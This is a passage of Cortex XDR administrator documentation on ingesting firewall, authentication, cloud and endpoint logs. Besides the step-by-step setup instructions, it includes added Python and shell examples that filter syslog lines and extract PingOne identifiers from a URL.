    • Check Point FW1/VPN1
    • Cisco ASA
    • Fortinet Fortigate
    • Corelight Zeek

Authentication Services
    • Azure AD
    • Okta
    • PingFederate
    • PingOne for Enterprise

Operation and System Logs
    • AWS CloudTrail and Amazon CloudWatch
    • Google Kubernetes Engine
    • Google Cloud Platform

Endpoint Logs
    • Windows Event Collector

Additional External Sources
    • External Vendors Forwarding CEF over Syslog
    • ElasticSearch Filebeat
    • Any vendor sending alerts

Cortex XDR can receive logs or both logs and alerts from the source. Depending on the data source, Cortex
XDR can provide visibility into your external data in the form of:
• Log stitching with other logs such as to create network or authentication stories.
• Raw data in queries from XQL Search.
• Logs in queries from Query Builder.
• Alerts reported by the vendor throughout Cortex XDR such as in the Alerts table, incidents, and views.
• Alerts raised by Cortex XDR on log data, such as Analytics alerts.
For more information, see Visibility of Logs and Alerts from External Sources in Cortex XDR.

To ingest data, you must set up the Syslog Collector applet on a Broker VM within your network.

Visibility of Logs and Alerts from External
Sources in Cortex XDR
Where you can view information ingested from external sources depends on the data source. The following
table describes the visibility of each vendor and device type. An entry describes what is supported; a dash (—)
indicates that the feature is not supported.

Network

Check Point FW1/VPN1 (Partial)
    Raw Data Visibility: Raw data is searchable in XQL Search. Logs with sessionid = 0 are dropped.
    Log Visibility: Network stories that include Check Point network connection logs are searchable in the
    Query Builder and in XQL Search. Logs with sessionid = 0 are dropped.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (Analytics, IOC, and BIOC) when
    relevant from logs.
    Vendor Alert Visibility: Alerts from Check Point firewalls are raised throughout Cortex XDR when relevant.

Fortinet Fortigate (Partial)
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: Network stories that include Fortinet network connection logs are searchable in the
    Query Builder and in XQL Search.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (Analytics, IOC, and BIOC) when
    relevant from logs.
    Vendor Alert Visibility: Alerts from Fortinet firewalls are raised throughout Cortex XDR when relevant.

Cisco ASA (Partial)
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: Network stories that include Cisco network connection logs are searchable in the
    Query Builder and in XQL Search.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (Analytics, IOC, and BIOC) when
    relevant from logs.
    Vendor Alert Visibility: —

Corelight Zeek (Partial)
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: Network stories that include Corelight Zeek network connection logs are searchable in
    the Query Builder and in XQL Search.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (Analytics, IOC, and BIOC) when
    relevant from logs.
    Vendor Alert Visibility: —

Authentication Services

Azure AD (Partial)
    Raw Data Visibility: Logs and stories are searchable in XQL Search.
    Log Visibility: Logs stitched with authentication stories are searchable in the Query Builder.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Okta (Partial)
    Raw Data Visibility: Logs and stories are searchable in XQL Search.
    Log Visibility: Logs stitched with authentication stories are searchable in the Query Builder.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

PingFederate (Partial)
    Raw Data Visibility: Logs and stories are searchable in XQL Search.
    Log Visibility: Logs stitched with authentication stories are searchable in the Query Builder.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

PingOne for Enterprise (Partial)
    Raw Data Visibility: Logs and stories are searchable in XQL Search.
    Log Visibility: Logs stitched with authentication stories are searchable in the Query Builder.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Operation and System Logs from Cloud Providers

AWS CloudTrail and Amazon CloudWatch
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: —
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Google Cloud Platform
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: —
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Google Kubernetes Engine
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: —
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Endpoint Logs

Windows Event Collector (Partial)
    Raw Data Visibility: Windows event logs are available with agent EDR data and are searchable in
    XQL Search.
    Log Visibility: Windows event logs are available with agent EDR data and are searchable in the
    Query Builder.
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: —

Additional External Sources

Other Vendors Sending CEF or LEEF over Syslog
    Raw Data Visibility: Raw data is searchable in XQL Search.
    Log Visibility: —
    Cortex XDR Alert Visibility: Cortex XDR can raise Cortex XDR alerts (IOC and BIOC only) when relevant
    from logs.
    Vendor Alert Visibility: To enable Cortex XDR to display alerts from other vendors, you must map your
    alert fields to the Cortex XDR field format (see Ingest External Alerts).

Any vendor sending alerts
    Raw Data Visibility: —
    Log Visibility: —
    Cortex XDR Alert Visibility: —
    Vendor Alert Visibility: Alerts are surfaced throughout Cortex XDR when relevant. To enable Cortex XDR
    to display your alerts, you must map your alert fields to the Cortex XDR field format (see Ingest
    External Alerts).

Ingest Network Connection Logs
• Ingest Logs from Check Point Firewalls
• Ingest Logs from Cisco ASA Firewalls
• Ingest Logs from Fortinet Fortigate Firewalls
• Ingest Logs from Corelight Zeek
• Ingest Logs from a Syslog Receiver

Ingest Logs from Check Point Firewalls


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Check Point FW1/VPN1 firewalls, you can still take advantage of Cortex XDR investigation and
detection capabilities by forwarding your Check Point firewall logs to Cortex XDR. Check Point firewall logs
can be used as the sole data source, however, you can also use Check Point firewall logs in conjunction with
Palo Alto Networks firewall logs and additional data sources.
Cortex XDR can stitch data from Check Point firewalls with other logs to make up network stories
searchable in the Query Builder and in XQL queries. Cortex XDR can also return raw data from Check Point
firewalls in XQL queries.

Logs with sessionid = 0 are dropped.

Destination Port data is available only in the raw logs.

In terms of alerts, Cortex XDR can both surface native Check Point firewall alerts and raise its own alerts on
network activity. Alerts are displayed throughout Cortex XDR alert, incident, and investigation views.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure your Check Point firewall policy to log all traffic and set up the Log
Exporter on your Check Point Log Server to forward logs to the Syslog Collector in a CEF format.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.

STEP 1 | Ensure that your Check Point firewalls meet the following requirements:
Check Point software version—R77.30, R80.10, R80.20, R80.30, or R80.40

STEP 2 | Increase log storage for Check Point firewall logs.


As an estimate for initial sizing, note that the average Check Point log size is roughly 700 bytes. For
proper sizing calculations, test the log sizes and log rates produced by your Check Point firewalls. For
more information, see Allocate Log Storage for Cortex XDR.

STEP 3 | Activate the Syslog Collector.

STEP 4 | Configure the Check Point firewall to forward syslog events in CEF format to the Syslog
Collector.
Configure your firewall policy to log all traffic and set up the Log Exporter to forward logs to the Syslog
Collector. For more information on setting up Log Exporter, see the Check Point documentation.

Ingest Logs from Cisco ASA Firewalls


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Cisco ASA firewalls, you can still take advantage of Cortex XDR investigation and detection
capabilities by forwarding your firewall logs to Cortex XDR. This enables Cortex XDR to examine your
network traffic to detect anomalous behavior. Cortex XDR can use Cisco ASA firewall logs as the sole data
source, but can also use Cisco ASA firewall logs in conjunction with Palo Alto Networks firewall logs. For
additional endpoint context, you can also use Cortex XDR to collect and alert on endpoint data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure forwarding on your log devices to send logs to the Syslog Collector.

STEP 1 | Verify that your Cisco ASA firewall meets the following requirements:
• Syslog in Cisco-ASA format
• Must include timestamps
• Only supports messages: 302013, 302014, 302015, 302016

STEP 2 | Activate the Syslog Collector.

STEP 3 | Increase log storage for Cisco ASA firewall logs.


As an estimate for initial sizing, note that the average Cisco ASA log size is roughly 180 bytes. For proper
sizing calculations, test the log sizes and log rates produced by your Cisco ASA firewalls. For more
information, see Allocate Log Storage for Cortex XDR.

STEP 4 | Configure the Cisco ASA firewall or the log device forwarding logs from it to log to the Syslog
Collector.
Configure your firewall policy to log all traffic and forward the traffic logs to the Syslog Collector. By
logging all traffic, you enable Cortex XDR to detect anomalous behavior from Cisco ASA firewall logs.
For more information on setting up Log Forwarding on Cisco ASA firewalls, see the Cisco ASA Series
documentation.
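The ingestion rules from the Check Point and Cisco ASA sections above, applied as a pre-ingestion check over forwarded syslog lines: Check Point CEF records with sessionid = 0 are dropped, and Cisco ASA lines are kept only when they carry a timestamp and one of message IDs 302013 through 302016. This is an added example, not Cortex XDR, Broker VM or vendor code; the sample lines are constructed, and the CEF extension key sessionid and the ASA message layout are assumed to match what the firewalls emit.

```python
import re
from typing import Dict, List, Tuple

# Ingestion rules taken from the Check Point and Cisco ASA sections above.
SUPPORTED_ASA_MESSAGE_IDS = {"302013", "302014", "302015", "302016"}

ASA_ID_RE = re.compile(r"%ASA-\d-(\d{6}):")
# Syslog timestamp at the start of the line (after an optional <PRI>): "Jan 12 2020 10:15:01",
# "Jan 12 10:15:01" or ISO 8601 "2020-01-12T10:15:01".
TIMESTAMP_RE = re.compile(
    r"^(?:<\d{1,3}>)?\s*(?:[A-Z][a-z]{2}\s+\d{1,2}\s+(?:\d{4}\s+)?\d{2}:\d{2}:\d{2}"
    r"|\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})"
)
# CEF extension pairs: a value runs until the next " key=" or the end of the line.
CEF_KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|\s*$)")


def parse_cef(line: str) -> Tuple[List[str], Dict[str, str]]:
    """Split a CEF record into its seven header fields and an extension dict.

    Returns ([], {}) when the line carries no CEF payload. Backslash-escaped pipes in the
    header are treated as literal characters, not separators."""
    start = line.find("CEF:")
    if start < 0:
        return [], {}
    parts = re.split(r"(?<!\\)\|", line[start:], maxsplit=7)
    if len(parts) < 7:
        return [], {}
    extension = parts[7] if len(parts) == 8 else ""
    return parts[:7], dict(CEF_KV_RE.findall(extension))


def triage(line: str) -> Tuple[str, bool, str]:
    """Classify one forwarded line as (source, accepted, reason) under the page's rules."""
    header, ext = parse_cef(line)
    if header:
        vendor = header[1]
        if "Check Point" not in vendor:
            return vendor, True, "CEF from another vendor; Check Point rules do not apply"
        if ext.get("sessionid") == "0":
            return "Check Point", False, "sessionid = 0 is dropped"
        return "Check Point", True, "accepted"
    match = ASA_ID_RE.search(line)
    if match:
        if not TIMESTAMP_RE.match(line):
            return "Cisco ASA", False, "no timestamp (timestamps are required)"
        if match.group(1) not in SUPPORTED_ASA_MESSAGE_IDS:
            return "Cisco ASA", False, f"message {match.group(1)} is not one of 302013-302016"
        return "Cisco ASA", True, "accepted"
    return "unknown", False, "not a recognised Check Point CEF or Cisco ASA line"


def summarize(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Count accepted and dropped lines per source, e.g. when sizing log storage before forwarding."""
    counts: Dict[str, Dict[str, int]] = {}
    for line in lines:
        source, accepted, _ = triage(line)
        bucket = counts.setdefault(source, {"accepted": 0, "dropped": 0})
        bucket["accepted" if accepted else "dropped"] += 1
    return counts


# Constructed sample lines (RFC 5737 addresses); field layout follows the vendors' formats.
SAMPLE_LINES = [
    "<134>Jan 12 2020 10:15:03 cp-mgmt CEF:0|Check Point|VPN-1 & FireWall-1|R80.40|Accept|Accept|Unknown|"
    "act=Accept src=192.0.2.10 dst=198.51.100.7 dpt=443 proto=tcp sessionid=4711",
    "<134>Jan 12 2020 10:15:04 cp-mgmt CEF:0|Check Point|VPN-1 & FireWall-1|R80.40|Accept|Accept|Unknown|"
    "act=Accept src=192.0.2.11 dst=198.51.100.7 dpt=443 proto=tcp sessionid=0",
    "Jan 12 2020 10:15:01 fw01 : %ASA-6-302013: Built outbound TCP connection 12345 for "
    "outside:198.51.100.7/443 (198.51.100.7/443) to inside:192.0.2.10/50122 (192.0.2.10/50122)",
    "fw01 : %ASA-6-302014: Teardown TCP connection 12345 for outside:198.51.100.7/443 to "
    "inside:192.0.2.10/50122 duration 0:00:02 bytes 1532 TCP FINs",
    "Jan 12 2020 10:15:05 fw01 : %ASA-6-106100: access-list inside_in permitted tcp "
    "inside/192.0.2.10(50123) -> outside/198.51.100.7(443) hit-cnt 1 first hit",
    "Jan 12 2020 10:15:06 fw01 : unrelated message with no vendor format",
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(triage(sample))
    print(summarize(SAMPLE_LINES))
```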

Ingest Logs from Fortinet Fortigate Firewalls


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Fortinet Fortigate firewalls, you can still take advantage of Cortex XDR investigation and
detection capabilities by forwarding your firewall logs to Cortex XDR. This enables Cortex XDR to examine
your network traffic to detect anomalous behavior. Cortex XDR can use Fortinet Fortigate firewall logs as
the sole data source, but can also use Fortinet Fortigate firewall logs in conjunction with Palo Alto Networks
firewall logs. For additional endpoint context, you can also use Cortex XDR to collect and alert on endpoint
data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
syslog collector. You then configure forwarding on your log devices to send logs to the syslog collector.

STEP 1 | Verify that your Fortinet Fortigate firewalls meet the following requirements:
• Must use FortiOS 6.2.1 or a later release
• Timestamps must be in nanoseconds

STEP 2 | Activate the Syslog Collector.

STEP 3 | Increase log storage for Fortinet Fortigate firewall logs.


As an estimate for initial sizing, note that the average Fortinet Fortigate log size is roughly 1,070 bytes.
For proper sizing calculations, test the log sizes and log rates produced by your Fortinet Fortigate
firewalls. For more information, see Allocate Log Storage for Cortex XDR.

STEP 4 | Configure the log device that receives Fortinet Fortigate firewall logs to forward syslog events
to the syslog collector.
Configure your firewall policy to log all traffic and forward the traffic logs to the syslog collector. By
logging all traffic, you enable Cortex XDR to detect anomalous behavior from Fortinet Fortigate firewall
logs. For more information on setting up Log Forwarding on Fortinet Fortigate firewalls, see the Fortinet
FortiOS documentation.

Ingest Logs from Corelight Zeek


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Corelight Zeek sensors for network monitoring, you can still take advantage of Cortex XDR
investigation and detection capabilities by forwarding your network connection logs to Cortex XDR. This
enables Cortex XDR to examine your network traffic to detect anomalous behavior. Cortex XDR can use
Corelight Zeek logs as the sole data source, but can also use logs in conjunction with Palo Alto Networks or
third-party firewall logs. For additional endpoint context, you can also use Cortex XDR to collect and alert
on endpoint data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure forwarding on your Corelight Zeek sensors (using the default Syslog
export option of RFC5424 over TCP) to send logs to the Syslog Collector.

STEP 1 | Activate the Syslog Collector.


During activation, you define the Listening Port over which you want the Syslog Collector to receive
logs. You must also set TCP as the transport Protocol and Corelight as the Syslog Format.

STEP 2 | Forward logs to the Syslog Collector.

Cortex XDR can receive logs from Corelight Zeek sensors that use the Syslog export option of RFC5424
over TCP.
1. In the syslog configuration of Corelight Zeek (Sensor > Export), enter the details for your Syslog
Collector including the hostname or IP address of the broker VM and corresponding listening port
that you defined during activation of the Syslog Collector, default Syslog format (RFC5424), and any
log exclusions or filters.
2. Save your syslog configuration to apply the configuration to your Corelight Zeek Sensors.
For full setup instructions, see the Corelight Zeek documentation.

Ingest Authentication Logs and Data
Ingesting Authentication Logs and Data requires a Cortex XDR Pro per TB license.

When you ingest authentication logs and data from an external source, Cortex XDR can weave that
information into authentication stories. An authentication story unites logs and data regardless of the
information source (for example, from an on-premise KDC or from a cloud-based authentication service)
into a uniform schema. To search authentication stories, you can use the Query Builder or Native Search.
Cortex XDR can ingest authentication logs and data from the following authentication services:
• Microsoft Azure AD
• Okta
• PingFederate
• PingOne

Ingest Logs from Microsoft Azure AD


Ingesting Logs from Azure AD requires a Cortex XDR Pro per TB license and a Microsoft
Azure Premium 1 or Premium 2 license.

To receive authentication and audit logs from Azure AD, you must first configure the SaaS Log Collection
settings in Cortex XDR. After you set up log collection, Cortex XDR begins receiving new logs and data from
the source.

To address Azure reporting latency, there is a 10-minute latency period for Cortex XDR to
receive Azure AD logs.

When Cortex XDR begins receiving logs, the app creates a new dataset (MSFT_Azure_AD_raw for
authentication logs or MSFT_Azure_AD_Audit_raw for audit logs) that you can use to initiate XQL Search
queries. For example queries, refer to the in-app XQL Library. When relevant, Cortex XDR stitches Azure
AD authentication logs with authentication stories. Cortex XDR can also raise Cortex XDR alerts (IOC and
BIOC only) when relevant from Azure AD logs.

STEP 1 | From the Microsoft Azure Console, create an app for Cortex XDR with the following API
permissions: AuditLog.Read.All and Directory.Read.All. For more information on Microsoft
Azure, see the following instructions on the Microsoft documentation portal:
• Register an app: https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app
• Add API permissions for Directory.Read.All and AuditLog.Read.All with type Application:
https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-configure-app-access-web-apis#add-permissions-to-access-web-apis
• Create an application secret:
https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal#create-a-new-application-secret

STEP 2 | Select Settings > SaaS Log Collection.

STEP 3 | Integrate the Microsoft Azure AD authentication service with Cortex XDR.
1. Enter the Tenant Domain of your Microsoft Azure AD tenant.

2. Obtain the Application Client ID and Secret for your Azure AD service from the Microsoft Azure
Console and enter the values in Cortex XDR.
These values enable Cortex XDR to authenticate with your Azure AD service.
3. Select the types of logs that you want to receive from your Azure AD service.
Options are Authentication Logs and Audit Logs. By default, both options are enabled.
4. Test the connection settings.
To test the connection, you must select one or both log types. Cortex XDR then tests the connection
settings for the selected log types.
5. If successful, Enable Azure AD log collection.

STEP 4 | After Cortex XDR begins receiving logs, you can return to the SaaS Log Collection page to view
the log collection status.
If you set up Cortex XDR to receive both authentication and audit logs, the events total includes both
log types.

STEP 5 | As part of your investigation flows, create queries when needed to search for specific Azure
AD logs.
See Create an Authentication Query (authentication logs only) or Create an XQL Query.

Ingest Authentication Logs and Data from Okta


Ingesting external logs and data requires a Cortex XDR Pro per TB license.

To receive authentication logs and data from Okta, you must first configure the SaaS Log Collection
settings in Cortex XDR. After you set up log collection, Cortex XDR immediately begins receiving new
authentication logs and data from the source. The information from Okta is then searchable in Cortex XDR
and can be included in authentication stories.

STEP 1 | Identify the domain name of your Okta service.


From the Dashboard of your Okta console, note your Org URL.
For more information, see the Okta Documentation.

STEP 2 | Obtain your authentication token in Okta.

1. Select API > Tokens.
2. Create Token and record the token value.
This is your only opportunity to record the value.

STEP 3 | Select > Settings > SaaS Log Collection.

STEP 4 | Integrate the Okta authentication service with Cortex XDR.


1. Enter the OKTA DOMAIN (Org URL) that you identified on your Okta console.
2. Enter the TOKEN used to authenticate with Okta.
3. Test the connection settings.
4. If successful, Enable Okta log collection.

STEP 5 | After Cortex XDR begins receiving information from the authentication service, you can Create
an Authentication Query or use Native Search to search for specific authentication data.

Ingest Authentication Logs from PingFederate


Ingesting Authentication Logs requires a Cortex XDR Pro per TB license.

To receive authentication logs from PingFederate, you must first write Audit and Provisioner Audit Logs
to CEF in PingFederate and then configure the SaaS Log Collection settings in Cortex XDR. After you
set up log collection, Cortex XDR immediately begins receiving new authentication logs from the source.
Cortex XDR creates a dataset named ping_identity_pingfederate_raw. Logs from PingFederate are
searchable in XQL queries using the dataset and surfaced, when relevant, in authentication stories.

STEP 1 | Activate the Syslog Collector.

STEP 2 | Set up PingFederate to write logs in CEF.


To set up the integration, you must have an account for the PingFederate management dashboard and
access to create a subscription for SSO logs.
In your PingFederate deployment, write audit logs in CEF. During this setup you will need the IP address
and port you configured in the Syslog Collector.

STEP 3 | Select > Settings > SaaS Log Collection.

STEP 4 | Connect Cortex XDR to your PingFederate for Enterprise authentication service.
1. Enter your PingFederate ACCOUNT ID.
2. Enter your PingFederate SUBSCRIPTION ID.
3. Enter your PingFederate USER NAME.
4. Enter your PingFederate PASSWORD.
5. Test the connection settings.
6. If successful, Enable PingFederate authentication log collection.
After configuration is complete, Cortex XDR begins receiving logs from the authentication service. From
the SaaS Log Collection page, you can view the log collection summary.

STEP 5 | To search for specific authentication logs or data, you can Create an Authentication Query or
use the XQL Search.

Ingest Authentication Logs and Data from PingOne
Ingesting Authentication Logs and Data requires a Cortex XDR Pro per TB license.

To receive authentication logs and data from PingOne for Enterprise, you must first set up a Poll
subscription in PingOne and then configure the SaaS Log Collection settings in Cortex XDR. After you set
up log collection, Cortex XDR immediately begins receiving new authentication logs and data from the
source. These logs and data are then searchable in Cortex XDR.

STEP 1 | Set up PingOne for Enterprise to send logs and data.


To set up integration, you must have an account for the PingOne management dashboard and access to
create a subscription for SSO logs.
From the PingOne Dashboard:
1. Set up a Poll subscription.
1. Select Reporting > Subscriptions > Add Subscription.
2. Enter a NAME for the subscription.
3. Select Poll as the subscription type.
4. Leave the remaining defaults and select Done.
2. Identify your account ID and subscription ID.
1. Select the subscription you just set up and note the part of the poll URL between /reports/ and /poll-subscriptions. This is your PingOne account ID.
For example:
https://admin-api.pingone.com/v3/reports/1234567890asdfghjk-123456-zxcvbn/poll-subscriptions/***-0912348765-4567-98012***/events
In this URL, the account ID is 1234567890asdfghjk-123456-zxcvbn.
2. Next, note the part of the poll URL between /poll-subscriptions/ and /events. This is your
subscription ID.
In the example above, the subscription ID is ***-0912348765-4567-98012***.
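The two identifiers can also be cut out of the poll URL mechanically, which avoids copy errors with the long opaque values. The following POSIX shell functions are an added example (not from the Cortex XDR guide or from Ping Identity) that do exactly that, using the guide's illustrative URL as input; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the Cortex XDR guide or from Ping Identity): pull the
# PingOne account ID and subscription ID out of a poll-subscription URL with
# POSIX parameter expansion, so the values pasted into Cortex XDR are exact.
# The URL below is the guide's illustrative example, not a real tenant.
POLL_URL='https://admin-api.pingone.com/v3/reports/1234567890asdfghjk-123456-zxcvbn/poll-subscriptions/***-0912348765-4567-98012***/events'

# Account ID: the path segment between /reports/ and /poll-subscriptions/.
# Fails (exit 1) when the URL does not contain /reports/.
pingone_account_id() {
    rest="${1#*/reports/}"
    [ "$rest" != "$1" ] || return 1
    printf '%s\n' "${rest%%/poll-subscriptions/*}"
}

# Subscription ID: the path segment between /poll-subscriptions/ and /events.
# Fails (exit 1) when the URL does not contain /poll-subscriptions/.
pingone_subscription_id() {
    rest="${1#*/poll-subscriptions/}"
    [ "$rest" != "$1" ] || return 1
    printf '%s\n' "${rest%%/events*}"
}

# Example usage: the two values for the Cortex XDR SaaS Log Collection form.
printf 'Account ID:      %s\n' "$(pingone_account_id "$POLL_URL")"
printf 'Subscription ID: %s\n' "$(pingone_subscription_id "$POLL_URL")"
```

Both functions return a non-zero status when the URL does not have the expected shape, so a wrapper script can refuse to continue instead of submitting an empty value to Cortex XDR.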

STEP 2 | Select > Settings > SaaS Log Collection.

STEP 3 | Connect Cortex XDR to your PingOne for Enterprise authentication service.
1. Enter your PingOne ACCOUNT ID.
2. Enter your PingOne SUBSCRIPTION ID.
3. Enter your PingOne USER NAME.
4. Enter your PingOne PASSWORD.
5. Test the connection settings.
6. If successful, Enable PingOne authentication log collection.
After configuration is complete, Cortex XDR begins receiving information from the authentication
service. From the SaaS Log Collection page, you can view the log collection summary.

STEP 4 | To search for specific authentication logs or data, you can Create an Authentication Query or
use the Native Search.

Ingest Operation and System Logs from Cloud
Providers
• Ingest Logs from AWS CloudTrail and Amazon CloudWatch
• Ingest Logs from Google Kubernetes Engine
• Ingest Logs and Data from a GCP Pub/Sub

Ingest Logs from AWS CloudTrail and Amazon CloudWatch


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use AWS CloudTrail or Amazon CloudWatch, you can forward logs for the respective service to Cortex
XDR. To enable log forwarding, you set up an Amazon Kinesis Data Firehose delivery stream and then add it to
your AWS CloudTrail or Amazon CloudWatch configuration. After you complete the setup process, logs from
the respective service are searchable in Cortex XDR to provide additional information and context to your
investigations.
To set up the AWS integration, you need an AWS role that grants permission to configure Amazon Kinesis
Firehose.

STEP 1 | Set up the AWS integration in Cortex XDR.


1. Select > Settings > SaaS Integrations.
2. In the AWS configuration, click the here link to begin a new configuration.

3. Enter a descriptive Name for your log collection configuration.


4. Enter the Vendor and Product for the type of logs you are ingesting.
The vendor and product are used to define the name of your XQL dataset
(<vendor>_<product>_raw). If you do not define a vendor or product, Cortex XDR uses the
default values of Amazon and AWS with the resulting dataset name as amazon_aws_raw. To
uniquely identify the log source, consider changing the values.

5. Choose the format of the data input source (CloudTrail or CloudWatch) that you will export to Cortex
XDR, either JSON or Text.
6. Save & Generate Token.
Click the copy icon next to the key and record it somewhere safe. You will need to provide this key
when you set up output settings in AWS Kinesis Firehose. If you forget to record the key and close
the window you will need to generate a new key and repeat this process.

7. Select Done to close the window.

STEP 2 | Create a Kinesis Data Firehose delivery stream to your chosen destination.
1. Log in to the AWS Management Console, and open the Kinesis console at https://console.aws.amazon.com/kinesis.
2. Select Data Firehose > Create delivery stream.

3. Define the name and source for your stream.


• Delivery stream name—Enter a descriptive name for your stream configuration.
• Source—Select Direct PUT or other sources.
• Server-side encryption for source records in the delivery stream—Ensure this option is disabled.
Click Next to proceed to the process record configuration.
4. Define the process records.
• Transform source records with AWS Lambda—Set the Data Transformation as Disabled.
• Convert record format—Set Record format conversion as Disabled.
Click Next to proceed to the destination configuration.
5. Choose a destination for the logs.
Choose HTTP Endpoint as the destination and configure the HTTP endpoint configuration settings:
• HTTP endpoint name—Enter the name you used to identify your AWS log collection configuration
in Cortex XDR.

• HTTP endpoint URL—Copy the API URL associated with your log collection from the Cortex XDR
management console ( > Settings > SaaS Integrations > Copy API URL). The URL will include
your tenant name (https://api-<tenant external URL>/logs/v1/aws).
• Access key—Paste in the token key you recorded earlier during the configuration of your Cortex
XDR log collection settings.
• Content encoding—Select GZIP. Disabling content encoding may result in high egress costs.
• Retry duration—Enter 300 seconds.
• S3 bucket—Set the S3 backup mode as Failed data only. For the S3 bucket, we recommend that
you create a dedicated bucket for Cortex XDR integration.
Click Next to proceed to the settings configuration.
6. Configure additional settings.
• HTTP endpoint buffer conditions—Set the Buffer size as 1 MiB and the Buffer interval as 60
seconds.
• S3 buffer conditions—Use the default settings for Buffer size as 5 MiB and Buffer interval as 300
seconds unless you have alternative sizing preferences.
• S3 compression and encryption—Choose your desired compression and encryption settings.
• Error logging—Select Enabled.
• Permissions—Select the Create or update IAM role option.
Select Next.
7. Review your configuration and Create delivery stream.
When your delivery stream is ready, the status changes from Creating to Active.

STEP 3 | To begin forwarding logs, add the Kinesis Firehose instance to your AWS CloudTrail or Amazon
CloudWatch configuration.
To do this, you add a subscription filter for Amazon Kinesis Firehose. See https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/SubscriptionFilters.html.

STEP 4 | Verify the status of the integration.


Return to the SaaS Integrations page and view the statistics for the log collection configuration.

STEP 5 | After Cortex XDR begins receiving logs from your Amazon services, you can use the XQL
Search to search for logs in the new dataset.

Ingest Logs and Data from a GCP Pub/Sub


Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use the Pub/Sub messaging service from Google Cloud Platform (GCP), you can send logs and data
from your GCP instance to Cortex XDR. Data from GCP is then searchable in Cortex XDR to provide
additional information and context to your investigations.
To receive logs and data from GCP, you must first set up log forwarding using a Pub/Sub topic in GCP. You
can configure GCP settings using either the GCP web interface or a GCP cloud shell terminal. After you set
up your service account in GCP, you configure the SaaS Log Collection settings in Cortex XDR. The setup
process requires the subscription name and authentication key from your GCP instance.
After you set up log collection, Cortex XDR immediately begins receiving new logs and data from GCP.
• Set up Log Forwarding Using the GCP Web Interface
• Set up Log Forwarding Using the GCP Cloud Shell Terminal

Set up Log Forwarding Using the GCP Web Interface


STEP 1 | Log in to your GCP account.

STEP 2 | Set up log forwarding from GCP to Cortex XDR:


1. Select Logging > Logs Router.
2. Select Create Sink > Cloud Pub/Sub topic and then click Next.
3. To filter only specific types of data, select the filter or desired resource.
4. In the Edit Sink configuration, define a descriptive Sink Name.
5. Select Sink Destination > Create new Cloud Pub/Sub topic.
6. Enter a descriptive Name that identifies the sink purpose for Cortex XDR, and then Create.
7. Create Sink and then Close when finished.

STEP 3 | Create a subscription for your Pub/Sub topic.


1. Select the hamburger menu in G Cloud and then select Pub/Sub > Topics.
2. Select the name of the topic you created in the previous steps. Use the filters if necessary.
3. Create Subscription > Create subscription.
4. Enter a unique Subscription ID.
5. Choose Pull as the Delivery Type.
6. Create the subscription.
After the subscription is set up, G Cloud displays statistics and settings for the service.
7. In the subscription details, identify and note your Subscription Name.
Optionally, use the copy button to copy the name to the clipboard. You will need the name when you
configure SaaS Collection in Cortex XDR.

